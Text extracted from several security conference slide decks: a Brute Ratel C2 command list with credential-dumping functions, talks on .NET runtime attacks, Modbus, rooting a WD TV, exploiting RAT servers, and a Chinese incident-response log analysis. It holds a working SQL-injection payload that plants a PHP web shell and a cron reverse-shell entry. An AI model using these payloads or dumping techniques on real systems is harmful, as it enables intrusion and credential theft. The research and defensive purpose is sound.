Execute a payload configuration on remote host by creating a remote badger service using RPC v0.3 *sccreate Creates a service on local or remote host using RPC v0.3 *scdelete Deletes a service on local or remote host using RPC v0.4.1 *scdivert Changes the service binary path for an existing service over local or remote host using RPC v0.5 *pivot_winrm In-memory implementation of WinRM to run WMI queries v0.5 *get_wmiconfig Return configured WMI namespace and user credentials for ‘wmispawn’ command v0.5 *set_wmiconfig Configures WMI namespace, domain username and password for ‘wmispawn’ command v0.5 *reset_wmiconfig Resets configured WMI namespace and user credentials for ‘wmispawn’ command v0.5 *wmispawn Runs a wmi query while using the wminamespace, username and password configured from ‘set_wmiconfig’ command. Default configuration is ‘ROOT\CIMV2’ Domain Enumeration Lateral Movement/Remote Host Enumeration Privilege Escalation/Enumeration v0.1 id Gets current user name v0.1 dumpclip Gets current user’s clipboard data v0.1 get_privs Gets full user privileges v0.1 *get_system Attempts to escalate privilege from Admin to SYSTEM/NT AUTHORITY v0.1 *system_exec Attempts to execute a process with SYSTEM privileges if the current user is in high integrity level v0.1 *set_debug Sets debug privileges required for querying several WinAPIs v0.1 net Supports running predefined net-based user/group enumeration without using running net.exe v0.1 *samdump Dumps NTLM hashes from SAM for all users in the local system v0.1 *shadowclone Dumps Lsass.exe memory using stealth techniques v0.1 make_token Creates a user token using domain name, username and password v0.1 revtoken Reverts a user token to self v0.5 *mimikatz Reflection enabled mimikatz by Benjamin Delphy. Can run usual mimikatz commands v0.5 dcsync Dump password hashes from a domain controller. Optionally takes an argument to dump only a single user’s hash. Can be used with an impersonated token v0.5 *dcsync_inject Injects dcsync module to a remote process and dumps password hashes from a domain controller. Optionally takes an argument to dump only a single user’s hash. Requires privileged badger System Enumeration v0.1 runas Runs a process as another user using domain name, username, password v0.1 shellspawn Runs a process, opens a file/video/music or other interactions using shell execution technique v0.1 screenshot Takes screenshot of the target user’s full desktop v0.3 scquery Queries windows service manager for all services v0.1 pwd Lists current directory v0.1 reg Runs registry queries without running reg.exe v0.1 mkdir Creates a directory v0.1 rm Deletes a file v0.1 rmdir Deletes a directory v0.1 ps Lists all running processes v0.1 kill Kills a process with a given process Id v0.1 cp Copies a file to a new location v0.1 mv Moves a file to a new location v0.1 change_wallpaper Changes target host’s active desktop wallpaper v0.1 download Downloads file from the target host v0.1 stop_downloads Stops all active downloads v0.1 upload Uploads a file to the target host v0.1 drivers Lists the drivers loaded on the system v0.1 idletime Gets user idletime from the host v0.1 uptime Gets the host’s uptime v0.1 lock_input Locks user’s input devices like mouse and keyboard and renders them useless until reboot v0.1 unlock_input Unlocks user’s input devices v0.1 lockws Locks user’s workstation v0.4.1 contact_harvester Extracts contacts from Outlook Address Book v0.4.1 ipstats Extracts DNS, Ipconfig and information related to network adapters v0.4.1 psgrep Subset of the ‘ps’ command. Searches for a specific process and returns basic process information v0.5 portscan Performs a TCP scan on a given host and space seperated port numbers v0.5 netshares Enumerates shares on local or a remote host. Additionally takes ‘/priv’ as an argument to check for admin privileges on the host v0.1 sleep This command changes the badger’s communication frequency to the Ratel server over a given jitter and sleep value v0.1 switch This command switches the badger’s command and control server/listener. The switch command can be highly useful when a badger has been compromised and the Red Team wants to reroute all backup badgers to a new ratel server C4 Opsec Configurations v0.1 tasks This command lists all pending tasks in the badger’s queue v0.1 exit This command kills the current badger and exits gracefully v0.1 title This command changes the title of the badger’s UI console v0.1 clrscr/cls This command clears the badger terminal screen Adhoc Commands
pdf
Attacking .NET Applications at Runtime Jon McCoy - 2010 www.DigitalBodyGuard.com What will this presentation cover? How to pWN closed-source .NET applications in new and dynamic ways New tools I am releasing Show how incredibly vulnerable .NET applications are What tools will you get? New Metasploit payload Tools to do reconnaissance, on the structure of .NET programs Beta - Decompilation Tool targeted at . NET Applications protected by wrappers/shells What will the hack do? Gain access to a target application Compromise the GUI Subvert core logic Instantiate new features Access the Object structure Connect to the Target Inject - Put your code into the target Infect - Change the target's code Exploit - Take advantage of a flaw Attack The Framework - Compromise the framework How the hack works: Overview 1. Connect to the target application -Connect With Injection 2. Access targets Object structure -Move around with Reflection 3. Modify values and/or Objects -Modify Objects with Reflection Normal Runtime Object Structure GUI Hacked Object Runtime Structure GUI Sample Code: Hack Event Reflection DEMO GUI_Spike LEET a Program VIDEO OF DEMO HACKS NOT LIVE DUE TO TIME APPLICATION Live demo Data Piggyback SQL FIN < NULL Special Thanks To Related Works of James Devlin www.codingthewheel.com Sorin Serban www.sorin.serbans.net/blog Erez Metula paper: .NET reverse engineering & .NET Framework Rootkits Thanks to assistance of Lynn Ackler Thank you for the mentorship and training in forensics. Daniel DeFreez Thank you for the help on research and vulnerability analysis (also the metasploit module) :-) Andrew Krug Thank you for the advanced IT support & shinyness. Adam REDACTED Thanks you for the IT Support; specifically hardware. License DotNetSpike and This Presentation are Licensed Under GNU General Public License - Ver. 3, 29 June 2007 This is an open source presentation presented at Defcon 18 with Tools released at Blackhat 2010 More information at: http://www.DigitalbodyGuard.com How is an attack done Connect to an Object Move Objects Change Objects Hack Events to change logic Wrap an Object to replace logic
pdf
Dam Control Substation Gas Distribution Petrochemical http://www.openplcproject.com Editor GUI Builder Raspberry Pi UniPi Linux (soft-PLC) Windows (soft- PLC) ESP8266 Arduino PiXtend FreeWave Zumlink Slave ID (1 byte) F. Code (1 byte) Data (n bytes) CRC (2 bytes) Slave ID (1 byte) F. Code (1 byte) Data (n bytes) CRC (2 bytes) Transaction ID (2 bytes) Protocol ID (2 bytes) Length (2 bytes) Unit ID (1 byte) F. Code (1 byte) Data (n bytes) Interruption Interception Modification Injection Transaction ID Protocol ID Length Unit ID Func. Code Coil Address Status Source: lirasenlared.xyz Source: lirasenlared.xyz Thiago Alves www.openplcproject.com
pdf
NinjaTV - Increasing Your Smart TV’s IQ Without Bricking It Felix Leder D About Myself • Passion: • Reverse Engineering (+ tool development) • Being out in the snow, being out on a bike, being out in the water • Fun Projects: • Bug hunting in malware • Botnet takeovers and countermeasure • The Honeynet Project • $$$ Job: • Mobile Threat Research @ Blue Coat Norway Credits Western Digital TV (Live Hub) Inside Motivation to get other TV stations Offline Analysis 1 Drive Investigation • WDTVPriv partition • Hauppauge TV app storage • Spotify offline storage • Last update pkg • WDTVLiveHub • Main media • Swap Offline Analysis 2 Updates Update contents felix@xxx:$ binwalk wdtvlivehub.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------ ------------------------------- 32 0x20 Squashfs filesystem, little endian, version 3.1, size: 94877984 bytes, 6913 inodes, blocksize: 131072 bytes, created: Tue Jul 16 05:17:54 2013 felix@xxx:$ binwalk wdtvlivehub.bin DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------ ------------------------------- 32 0x20 Squashfs filesystem, little endian, version 3.1, size: 94877984 bytes, 6913 inodes, blocksize: 131072 bytes, created: Tue Jul 16 05:17:54 2013 00000000 63 34 32 63 35 34 61 63 32 66 38 33 34 32 66 66 |c42c54ac2f8342ff| 00000010 38 31 36 65 36 36 65 64 36 64 39 38 38 33 31 30 |816e66ed6d988310| 00000020 68 73 71 73 01 1b 00 00 00 00 00 00 00 00 00 00 |hsqs............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 00 |................| 00000040 00 00 11 00 e0 01 00 62 bb e4 51 b4 1b 06 08 01 |.......b..Q.....| 00000000 63 34 32 63 35 34 61 63 32 66 38 33 34 32 66 66 |c42c54ac2f8342ff| 00000010 38 31 36 65 36 36 65 64 36 64 39 38 38 33 31 30 |816e66ed6d988310| 00000020 68 73 71 73 01 1b 00 00 00 00 00 00 00 00 00 00 |hsqs............| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 03 00 01 00 |................| 00000040 00 00 11 00 e0 01 00 62 bb e4 51 b4 1b 06 08 01 |.......b..Q.....| Firmware signatures wdtvlivehub.bin wdtvlivehub.bi2 End Signature (16 bytes) CE FA BE BA 02 00 00 00 Image I size (little endian) 00 00 00 00 Image I root Squashfs 3.1 image Start Signature (32 bytes) MD5 of Image I + end signature End Signature (32 bytes) MD5 of Image I + end signature Image II /opt Squashfs 3.1 image Signature MD5 of Image II + end signature Update contents 2 Wdtvlivehub.bin Wdtvlivehub.bi2 • /opt mounted Which way in? Vulnerability Finding Vulnerability finding SQL injection – here we come 0“; ATTACH DATABASE ‘lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;-- 0“; ATTACH DATABASE ‘lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘<? system($_GET[‘cmd’]); ?>’;-- Vulnerability finding RFI – remote file inclusion E Where to place my PHP shell? Investigating more files: • /tmp/media/usb/Local/WDTV LiveHub/ is root of SMB share • So my videos are in /tmp/media/usb/Local/WDTV LiveHub/Videos/ M That was only the beginning… Webserver running as root = w00t O Must remember low hanging fruits… /opt/webserver/htdocs # ls -l … -rw-rw-r-- 1 1007 1007 1685 Jun 24 2013 system_password.php -rw-rw-r-- 1 1007 1007 142 Jun 24 2013 test.php drwxrwxr-x 3 1007 1007 21 Jul 16 2013 tmp lrwxrwxrwx 1 1007 1007 32 Dec 12 08:15 user -> /tmp/media/usb/Local/WDTVLiveHub drwxrwxr-x 8 1007 1007 298 Jul 16 2013 wd_nas drwxrwxr-x 3 1007 1007 23 Jul 16 2013 wdtvlivehub drwxrwxr-x 2 1007 1007 102 Jul 16 2013 whatson Approach for HW hackers Looking for interesting pins D Booting up End of boot 41fa4f6ac0b8ebdefb89d443cb6c5ece login: • What is the password? Reverse Engineering the boot process (parts of it) • Password is set by a tool called gbus_read_serial_num • Located in /usr/local/sbin (encrypted file system image) • Original: /home/file AES encrypted • AES key to mount this image retrieved from ROM during boot • Not visible in raw update bins gbus_read_bin_to_file 0x61d00 0x280 /tmp/xosinfo && genxenv2 g /tmp/xosinfo bc01 \ | sed 's/.*.bc01\(.*\)/\1/g' | sed 's/\ //g' > /tmp/log1 2>&1 echo `cat /tmp/log1` | mymount /home/file /usr/local/sbin -oencryption=aes -p 0 Visual AES Key What’s the root password? • RE gbus_read_serial_num echo $SERIALNUMBER | md5sum 41fa4f6ac0b8ebdefb89d443cb6c5ece login: root Password: <MD5SUM_OF_^^> BusyBox v1.10.0 (2013-06-21 20:40:53 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # E Where are the Apps? Many traces on disk • Logos for all services • Libraries and DRM files for some • Spotify • Netflix • … • NO Apps for e.g. redbull.tv, AOL, Bild.de DMAOSD – the heart of WD TV • Last process started • System automatically reboots after process dies (e.g. is killed) • Located in the encrypted partition • Uses 75% of available RAM Services M Service details • On first connection WD TV uses GeoIP to determine country • Some services are country specific (e.g. bild.de, ivi.ru) • Pure web-pages • Others use pipes to connect to local binaries/libraries (e.g. spotify) • Crazy jump tables and if- statements O Dmaosd – all in one • 13 MB (huuge executable for MIPS – even for x86) • Everything statically linked in • QT webbrowser to access the web “services” • Libraries for HDMI and codec chips • Auto-mounts attached USB sticks, built-in harddrive • Controls network shares • Update daemon • Renderer for XML based menus • Loads all resources (templates, pictures, …) into it’s process space Debugging Dmaosd live – get GDB up Step 1: GDBServer on device • Compile chain for MIPS create GDBServer • http://www.mentor.com/embedded-software/sourcery-tools/sourcery- codebench/overview/ • LSB, software floating point, shared libraries (COMPILKIND=glibc,softfloat mipsel-linux-gcc -o test.mips test.c) • Copy GDBServer executable on device Debugging Dmaosd– attach IDA Pro • IDA Pro for remote debugging (alternatively MIPS gdb) • Very sensitive / unreliable • Don’t be fooled by pipelining in assembly • You cannot break much ☺ (more on that later) This is executed D Tatort How to get my own services on the box? Broadcaster “Das Erste” live stream Browser – lowest hanging fruit • QT embedded browser started • Run – time patch the urls • Windows: OpenProcess, WriteProcessMemory • Linux: ptrace • PTRACE_ATTACH to process • PTRACE_PEEKDATA to search • PTRACE_POKEDATA to overwrite (in place – size limit) http://www.redbull.tv http://www.cnn.com D Supported (HW) codecs? TV station codec has to fit NPPVpluginDescriptionString The <a href="http://www.gnome.org/projects/totem/">Totem</a> 0.10.2 plugin handles video and audio streams NP_GetMIMEDescription = application/acetrax:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms- asf;application/maxdome:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;application/sigma:mp4, wmv, mp3:video/x-ms- wmv;audio/mp3:mp3:audio/mp3;video/mp4:mp4:video/mp4;audio/mpeg:mpg:audio/mpeg;vid eo/wmv:wmv:video/wmv;video/mpeg4:mp4:video/mpeg4;video/x-flv:flv,f4v:video/x- flv;application/x-mpegurl:m3u8:vnd.apple.mpegurl;audio/x- wav:wav:audio/wav;video/mp2t:ts:video/mp2t;application/x-netcast- av::;application/yotavideo:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;video/vnd.ms- playready.media.pyv:pyv:video/vnd.ms-playready.media.pyv;application/nowtilus:mp4, wmv:video/x-ms-wmv;video/mpeg4:mp4:video/mpeg4 NPPVpluginDescriptionString The <a href="http://www.gnome.org/projects/totem/">Totem</a> 0.10.2 plugin handles video and audio streams NP_GetMIMEDescription = application/acetrax:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms- asf;application/maxdome:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;application/sigma:mp4, wmv, mp3:video/x-ms- wmv;audio/mp3:mp3:audio/mp3;video/mp4:mp4:video/mp4;audio/mpeg:mpg:audio/mpeg;vid eo/wmv:wmv:video/wmv;video/mpeg4:mp4:video/mpeg4;video/x-flv:flv,f4v:video/x- flv;application/x-mpegurl:m3u8:vnd.apple.mpegurl;audio/x- wav:wav:audio/wav;video/mp2t:ts:video/mp2t;application/x-netcast- av::;application/yotavideo:mp4, wmv, mp3:video/x-ms- wmv;video/wmv:wmv:video/wmv;video/x-ms-asf:wmv:video/x-ms-asf;video/vnd.ms- playready.media.pyv:pyv:video/vnd.ms-playready.media.pyv;application/nowtilus:mp4, wmv:video/x-ms-wmv;video/mpeg4:mp4:video/mpeg4 Finally ☺ O Root but not 0wnd ROM filesystem root but not 0wnd by me # mount ... /dev/sigmblockh on / type squashfs (ro) root ... none on /tmp type tmpfs (rw) /dev/sigmblocki on /opt type squashfs (ro) /dev/loop0 on /tmp/static_config type minix (rw) /dev/loop1 on /usr/local/sbin type romfs (ro) tmpfs on /opt/webserver/logs type tmpfs (rw) none on /lib/sigma type ramfs (rw) /dev/sda3 on /tmp/media/usb/Local/WDTVLiveHub type ufsd (rw,nls=utf8,uid=0,gid=0,fmask=0,...) # mount ... /dev/sigmblockh on / type squashfs (ro) root ... none on /tmp type tmpfs (rw) /dev/sigmblocki on /opt type squashfs (ro) /dev/loop0 on /tmp/static_config type minix (rw) /dev/loop1 on /usr/local/sbin type romfs (ro) tmpfs on /opt/webserver/logs type tmpfs (rw) none on /lib/sigma type ramfs (rw) /dev/sda3 on /tmp/media/usb/Local/WDTVLiveHub type ufsd (rw,nls=utf8,uid=0,gid=0,fmask=0,...) • All persistent file systems are read-only (from ROM) • All dynamic parts are copied over to /tmp (including shadow, hosts, …) • Fresh reset after reboot Root FS (ROM) Root FS (ROM) /tmp (RAM) /tmp (RAM) Copy Copy Persistence … without the risk of bricking it Patch firmware conservatively Want to avoid bricking • Use clean reset scheme • Place other tools where they can be removed externally - harddrive (just in case) • Don’t patch the main image has several integrity checks (good conditions to run into problems) • … patch as little as possible /init /init /bin/run_all /bin/run_all /bin/dmaosd.sh /bin/dmaosd.sh /opt/qt/bin/run_qt Challenge: Mount order • Dmaosd is last process started • Mounts the hard drive • Race condition: No dmaosd if run_qt blocks no hard drive block • Solution: 1. Return control and continue as background process 2. Wait for hard drive to be mounted 3. Continue booting there /init /bin/run_all /bin/dmaosd.sh /opt/qt/bin/run_qt & Where are the lawyers? GPL? Linux? … GPL Firmware • Available but … • will lose all DRM keys • Potentially WD keys • … I haven’t tried what is lost http://support.wd.com/product/download.asp?groupid=1010&sid=134&lang=en Where is the security? Conspiracy Theory • Why is WD basically leaving the device open? Outlook My situation Your options Questions?
pdf
Digital Vengeance Exploiting the Most Notorious C&C Toolkits @professor__plum Disclaimer The views expressed herein do not necessarily state or reflect the views of my current or former employers. I am not responsible for any use or misuse of the information provided. Implementation of the information given is at your own risk. “The malware that was used would have slipped or probably got past 90% of internet defenses that are out there today in private industry” Joseph Demarest, assistant director of the FBI’s cyber division The sophisticated attack “hackers obtained data on tens of millions of current and former customers and employees in a sophisticated attack“ Anthem “… identified an extremely sophisticated cyber attack” RSA "It is simply not possible to beat these hackers” James A. Lewis Cybersecurity Expert at Center for Strategic and International Studies (CSIS) “Government and non-government entities are under constant attack by evolving and advanced persistent threats and criminal actors. These adversaries are sophisticated, well-funded, and focused.” Office of Personnel Management "The threat is very persistent, adaptive and sophisticated – and it is here to stay,” SWIFT Hacking back 36% of BH 2012 attendees surveyed said they engaged in some form of hacking back Many feel justified in hacking back because their government isn’t doing enough to protect them The ACDC would exempt victims from hacking laws when the aim is to identify the assailant, cut off attacks or discover stolen files.  Most likely Illegal Little to no gain Much at risk Liability Reputation Productivity Escalation Hacking back Active Cyber Defense Certainty Act RAT terminology • Client • Victim • Target • C2 Server • Attacker • Victim • Adversary • Retaliator - one who returns assault in kind *icons credit Open Security Architecture Sophisticated attack hit list • Buffer overflow exploit by Andrzej Dereszowski • Follow on work by Jos Wetzels APT1 & Poison Ivy Remote file download exploit by Shawn Denbow and Jesse Hertz Follow on work by Jos Wetzels Xtreme RAT Xtreme Rat TCP connection starts with the string “myversion|3.x\r\n” C2 responds with “X\r\n” Alternatively Xtreme rat can use a fake HTTP request of the form GET /[0-9]{1,10}.functions Remote file upload Get ready to receive tool\bad.exe and save it to C:\temp\calc.exe I’m ready to receive tool\bad.exe Here is the [data] Remote file download Win.ini (Sanity check) Event logs desktop.ini %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\repair\system https://attackerkb.com/Windows/blind_files PlugX / Korplug / Destory Demo Gh0st RAT Gh0st RAT Most notably identified by C2 traffic which start with the 5 byte marker “Gh0st”
 (or other 5 byte marker) 00000, 7hero, ABCDE, Adobe, ag0ft, apach, Assas, attac, B1X6Z, BEiLa, BeiJi, Blues, ByShe, cb1st, chevr, CHINA, cyl22, DrAgOn, EXXMM, Eyes1, FKJP3, FLYNN, FWAPR, FWKJG, GWRAT, Gh0st, Gi0st, GM110, GOLDt, HEART, Hello, https, HTTPS, HXWAN, Heart, httpx, IM007, ITore, kaGni, KOBBX, KrisR, light, LkxCq, LUCKK, LURK0, lvxYT, LYRAT, Level, Lover, Lyyyy, MOUSE, MYFYB, MoZhe, MyRat, Naver, NIGHT, NoNul, Origi, OXXMM, PCRat, QQ_124971919, QWPOT, Snown, SocKt, Spidern, Super, Sw@rd, Tyjhu, URATU, v2010, VGTLS, W0LFKO, Wangz, wcker, Wh0vt, whmhl, Winds, wings, World, X6M9K, X6RAT, XDAPR, xhjyk, Xjjhj, xqwf7, YANGZ “The many faces of Gh0st Rat” — Snorre Fagerland Remote file upload Give me C:\Documents\user\file.doc so I can save it to targetX\file.doc Here is the [data] so you can save it to targetX\file.doc Remote file upload Here is the [data] so you can save it to C:\…\startup\backdoor.exe DLL side load vulnerability Gh0st Server has a dependency on oledlg.dll Only imports one function #8 OleUIBusyA(int) Return 1 and all is good Exploitation Control pointer to pointer Could use a information disclose vuln (if I had one) Thus, take the lazy man’s approach and heap spray DEP would break this but it also seems to break the EXE Decode implant configs https://github.com/kevthehermit/RATDecoders Gh0st Xtreme Rat Poision Ivy DarkComet Many others Showdan Demo Post exploitation Netstat IP address of other victims May show RDP connections in (or out) Walk FS looking for other hacking tools Install persistance Install keylogger Steal credentials Thank you @professor__plum
pdf
中国网安集团·广州三零卫士 伍智波(SkyMine) ①Linux主要日志类型的分析 ②Windows主要日志类型的分析 ③某次真实入侵事件的日志分析过程 ④入侵案例攻击链分析 ①Linux主要日志类型的分析 accesslog accesslog是web中间件最 为重要的日志文件之一,它 记录了访问web应用的所有 请求,其中记录的字段主要 包括来源IP、请求时间、请 求方法、请求路径、HTTP状 态码、请求包大小等,是识 别web攻击的重要指标。 192.168.97.1 - - [02/Mar/2018:02:24:16 +0800] "GET /guestbook.php HTTP/1.1" 200 831 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 192.168.97.1 - - [02/Mar/2018:02:54:28 +0800] "GET /manage/login.php?gotopage=%20UNION%20AL L%20SELECT%20NULL%2CNULL%2CNULL- -%20AFdY HTTP/1.1" 200 1689 "-" "sqlmap/1.2.4#stable (http://sqlmap.org)" ①Linux主要日志类型的分析 /var/log/secure /var/log/secure是linux的 重要日志之一,它记录了安 全信息和系统登录的相关信 息,包括ssh登录、sftp等, 通过这个日志文件,可以审 计ssh爆破、22端口非法文件 操作等安全事件。 Mar 2 06:10:02 ubuntu sshd[4886]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.97.1 user=test Mar 2 06:10:02 ubuntu sshd[4860]: pam_unix(sshd:session): session opened for user test by (uid=0) ①Linux主要日志类型的分析 /var/log/secure /var/log/secure是linux的 重要日志之一,它记录了安 全信息和系统登录的相关信 息,包括ssh登录、sftp等, 通过这个日志文件,可以审 计ssh爆破、22端口非法文件 操作等安全事件。 Mar 2 06:15:14 ubuntu sftp-server[5181]: session opened for local user test from [192.168.97.1] Mar 2 06:24:08 ubuntu sftp-server[5181]: open "/tmp/test.php" flags WRITE,CREATE,TRUNCATE mode 0644 Mar 2 06:24:08 ubuntu sftp-server[5181]: close "/tmp/test.php" bytes read 0 written 1486 ①Linux主要日志类型的分析 /var/log/cron /var/log/cron是linux的系 统日志之一,它记录了系统 所有的计划任务执行记录, 在这个日志里往往可以找到 黑客“后渗透阶段”设置的一 些持久性后门。 Mar 2 08:52:01 ubuntu cron[1115]: (*system*) RELOAD (/etc/crontab) Mar 2 08:53:01 ubuntu CRON[7469]: (root) CMD (/opt/shell.elf &) ②Windows主要日志类型的分析 安全日志 Windows服务器分 析安全事件,安全日志 是最重要的数据之一, 利用这个日志,我们可 以获悉3389账号爆破等 常见的攻击类型。 ③某单位遭遇黑客入侵后的日志分析过程 某单位在2018年3月2日上午8点50分左右被上级单位通报,发现其单位的门 户网站服务器正在不断对外连接浙江省IP地址110.75.192.33的TCP 8888端口, 我单位应急响应小组于当天上午9点40分到达现场处置该事件。 ※本案例中的地域、IP、端口、时间、URL等敏感信息均已虚假化, 所有截图均是在实验环境中复现。 ③某单位遭遇黑客入侵后的日志分析过程 应急响应小组到场后,迅速通过netstat –anltp | grep “110.75.192.33:8888”尝试 定位对外连接的进程,找到了这个进程,随后通过ps –aux | grep “shell.elf”找到了 进程的路径,记录了shell.elf的创建时间(也就是上传时间),我们发现shell.elf的 权限是root,证明黑客已经获得root权限。 shell.elf 经过逆向分析,确认是msf反向连接后门 ③某单位遭遇黑客入侵后的日志分析过程 根据通报,向110.75.192.33的TCP 8888端口发送的连接请求是不断发生的,但 根据我们对shell.elf的逆向分析,这个文件本身并不具备重复连接的功能,因此我 们推断黑客为shell.elf设置了计划任务,我们通过查看/var/log/cron印证了这个想法。 ③某单位遭遇黑客入侵后的日志分析过程 于是我们执行了last命令,查看了root用户的登录记录,结果发现了惊天大秘 密,root用户曾经在上午8点17分~8点24分被黑客登录过,持续时间为7分钟,我 们马上查看了/var/log/secure,确认黑客是通过sftp上传shell.elf的。 ③某单位遭遇黑客入侵后的日志分析过程 在/var/log/secure中我们还发现了在黑客成功登录root用户前,系统上的所有 拥有登录权限的用户在早上7点15分左右都被尝试爆破过,用户名十分精准,一 个多余的用户名都没有,因此我们猜测/etc/passwd文件可能已经暴露。 早上7点41分左右,root用户被成功爆破 ③某单位遭遇黑客入侵后的日志分析过程 由于/etc/passwd文件暴露时,黑客尚未取得root用户密码,因此我们推断黑客 是通过某个web漏洞来读取/etc/passwd文件的,因此我们开始分析accesslog,我们 通过cat access.log | grep “110.75.192.33”命令确定了110.75.192.33 仅仅是个msf的控 制端,黑客没有用来访问过网站,访问网站是使用39.128.40.187的,访问次数为 204907。 ③某单位遭遇黑客入侵后的日志分析过程 我们确定了黑客使用的IP为39.128.40.187,于是我们在accesslog针对这个IP进 行了访问行为分析,我们在翻看accesslog的过程中发现了来自该IP的一条诡异的 GET请求记录,通过验证,我们确认了此处存在远程代码执行漏洞,黑客就是在 此处读取/etc/passwd文件的,但进行这个GET请求必须具备访问后台的权限。 ③某单位遭遇黑客入侵后的日志分析过程 由于这个远程代码执行漏洞在manage目录下,黑客可以成功利用代表黑客已 经取得管理后台的权限,因此我们继续翻看accesslog,发现黑客在凌晨3点50分左 右曾经对管理后台账号密码进行过爆破,且爆破成功。 访问manage目录返回200,证明密码爆破成功 ③某单位遭遇黑客入侵后的日志分析过程 现在我们基本上可以确定,黑客的一切入侵行为,都是从管理后台处进行突 破的,再往上翻看日志,也能发现黑客在凌晨2点19分左右就开始对网站进行漏 洞扫描和目录扫描了。 ④入侵案例攻击链分析 2018/3/2 02:13:54 黑客最初访问该单位网站 2018/3/2 02:19:31 黑客开始对网站进行漏洞扫描,无果 2018/3/2 03:15:44 黑客开始扫描网站目录 2018/3/2 03:20:35 黑客成功跑到后台管理地址 2018/3/2 03:26:56 黑客开始爆破后台管理密码 2018/3/2 04:10:13 黑客成功登录管理后台,开始对管理后台进行渗透 2018/3/2 05:43:01 黑客发现远程代码执行漏洞,读取了/etc/passwd文件内容 2018/3/2 07:13:15 黑客开始通过SSH爆破可登录用户 2018/3/2 07:41:25 黑客成功爆破root用户密码 2018/3/2 08:31:07 黑客利用sftp上传了反向木马shell.elf,并设置计划任务 2018/3/2 08:50:xx shell.elf反向连接行为被上级单位识别,并被通报 Thank you!
pdf
护 网 的 起 源 和 演 变 01 未 知 攻 , 焉 知 防 02 实 战 出 真 知 03 目 录 CONTENTS 护网的起源和演 变 PART 1 护 网 的 起 源 和 演 变 — 新 形 势 下 攻 防 对 抗 法律法规 国家标准 基线检查 渗透测试 国家 层面 APT 组织型 常态化攻防演练 新的验证体系 监管要求 国际标准、规范 旧的验证体系 安全检查 漏洞扫描 思路转变 验证体系思路转变 “ 锁 盾 ” 攻 防 演 习  “Locked Shields”系列演习是北约年度例行性网络 安全演习,于2010年启动;  模式:假想国家“Berylia”;  目标:攻击模拟的海军基地、电站等关键信息基础 设施;  时长:5天;  2018年演习 ,参演人数1000,参演国家30,攻击 次数2500,虚拟系统4000个;  2019年由北约总部牵头,在爱沙尼亚和芬兰国防军、 美军欧洲司令部、韩国国家安全研究院以及西门子、 思科等科技公司的协助下开展演习。 “ 网 络 风 暴 ” 攻 防 演 习  美国国土安全部(DHS)主导,2006年开始,每2 年举行一次;  目的:侧重于考察跨国家、政府机构等针对关键基 础设施遭到网络攻击的情况下的协调应急能力(政 府-企业+各国政府) 、评估信息共享流程、加强多 国合作。  形式:60支队伍,模拟攻击关键基础设施;  时间:1周;  特色:模拟社交网络披露漏洞/物理攻击等。 护 网 的 起 源 和 演 变 — 国 外 网 络 安 全 攻 防 演 习 护 网 的 起 源 和 演 变 —“ 护 网 行 动 ” 网 络 攻 防 演 习 概述 “护网行动”网络攻防演习是由公安机关组织的,覆盖政府、能源、交通、卫生、金融、教育等 行业的集中网络攻防演练行动。  时间:2~3周 方式:组织120~130支攻击队伍,对各行业重点单位150余家目标系统进行集中攻击,检验防守 方对攻击的防护能力,以积分形式确定防守方排名。  特点:高度仿真的APT攻击,测试人员更关注权限和数据。 参演方  攻击方:由公安机关授权的国家科研机构、安全公司/团队组成;  防守方:防守企业;  指挥部:根据攻守双方报告信息,进行评分。 2019 2018 2017 2016 试点阶段 无经验,担心出 问 题 攻击思路: 传统攻击行为、互联 网突破、旁站攻击、 内网跨域…… 拓展阶段 监管利器,被监管 单 位认知不足 攻击思路: 传统攻击行为、互联网 突破、旁站攻击、内网 跨域…… 认可阶段 头部企业认可,部 分 行业开始组织演 练 攻击思路: 传统攻击行为、互联网 突破、内网跨域、邮箱 系统、免杀工具…… 普及阶段 强信息化机构,普 遍 尝试实战演练 攻击思路: 传统攻击行为、互联网突 破、内网跨域、开始使用 0Day、邮箱系统、社工 攻击、物理设备…… 2020 常态化/推广阶段 扩大演练覆盖面,向 常 态化转变 攻击思路: 传统攻击行为、互联网突 破、内网跨域、更多0Day、 邮箱系统、免杀工具、社 工攻击、物理设备…… 护 网 的 起 源 和 演 变 — “ 护 网 行 动 ” 发 展 史 护 网 的 起 源 和 演 变 — 攻 击 方 简 要 计 分 规 则 ( 参 考 ) 低 高 账号权限 主机权限 重要系统权限 权限获取 边界突破 靶标系统 逻辑隔离 物理隔离 生产网 目标系统 核心业务 核心数据 高 计分注意事项 靶标系统拿下后防守企业可能 退出演习;  单项得分和总分均有上限;  提交0Day漏洞有加分,有上限;  被溯源/反制的攻击队将被扣分。 护 网 的 起 源 和 演 变 — 防 守 方 简 要 计 分 规 则 ( 参 考 ) 低 高 账号权限 主机权限 重要系统权限 权限获取 边界突破 靶标系统 逻辑隔离 物理隔离 生产网 目标系统 核心业务 核心数据 高 计分注意事项 发现并处置攻击,提交报告 可加分,但加分小于扣分; 溯源攻击者身份可额外加分, 反制攻击者也有加分;  总结报告分数有一定占比。 攻击方得分则防守方失 分 护 网 的 起 源 和 演 变 — 新 形 势 下 攻 防 对 抗 HW小插曲(木桶短板): 目标数据库系统经测试无任何安全隐患,渗透过程中发现测试环境数据库账号(密码)明文存 